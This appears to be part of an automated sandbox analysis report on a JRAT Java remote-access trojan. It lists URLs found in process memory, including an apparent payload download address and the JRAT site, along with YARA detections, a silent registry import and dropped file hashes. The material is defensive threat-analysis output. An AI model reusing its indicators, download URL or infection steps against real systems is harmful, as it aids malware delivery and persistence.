Source: javaw.exe, 00000006.00000002.2851634120.0000000009FE2000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.0000000005253000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.000000000530E000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A555000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A608000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://opensource.org/licenses/bsd-license.php
Source: wscript.exe, 00000005.00000003.1667383984.0000000006E96000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1656110679.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1661002252.0000000006894000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.1665048799.0000000006A73000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.1676383975.00000000005F3000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://wshsoft.company/jv/jrex.zip
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/
Source: xcopy.exe, 00000015.00000003.1745226975.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1745013590.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: xcopy.exe, 00000015.00000003.1728482839.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705197619.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1730677156.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703805489.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705497311.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1701984344.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1731847868.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1738221314.000000000277F000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1734516541.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703628681.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725756466.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1705281833.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1726602349.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725315701.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1703719180.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1733614981.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1725508853.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1727080708.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000015.00000003.1728367082.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 
00000015.00000003.1740826743.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ibm.com.
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.lotus.com.
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
Source: java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/a/lang$
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit(L
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo:
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepthche/xerC
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimitutil/7
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit
Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxOccurLimit;E
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxParameterEntitySizeLimitJ
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxXMLNameLimit;T
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimit
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/totalEntitySizeLimitb
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/xmlSecurityPropertyManager
Source: xcopy.exe, 00000015.00000003.1744919775.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sun.com.
Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/
Source: xcopy.exe, 00000015.00000003.1742677485.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.torchmobile.com/)
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.unicode.org/copyright.html
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/allow-dtd-events-after-endDTD=
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/eam;
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entities
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-general-entitiesex
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/external-parameter-entities
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesna(
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespace-prefixesrn(
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces
Source: java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespaces&
Source: javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/namespacess
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/use-entity-resolver2
Source: javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/features/validation
Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/
Source: java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/(
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/nt(
Source: javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: xcopy.exe, 00000015.00000003.1743343151.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://download.java.net/java/GA/jdk8u361/0ae14417abb444ebb02b9815e2103550/b09/ecc-8u-src.zip
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/LICENSE.txt
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/rober42539/lao-dictionary/laodict.txt
Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.io
Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://jrat.ios
Source: xcopy.exe, 00000015.00000003.1742230987.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/MPL/2.0/.
Source: xcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sourceforge.net/project/?group_id=1519

System Summary

Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED Matched rule: Detects JRAT malware Author: Florian Roth
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe File created: C:\Windows\SysWOW64\test.txt
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_02983518 6_2_02983518
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_029C6D50 6_2_029C6D50
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
Source: api-ms-win-core-sysinfo-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.21.dr Static PE information: No import functions for PE file found
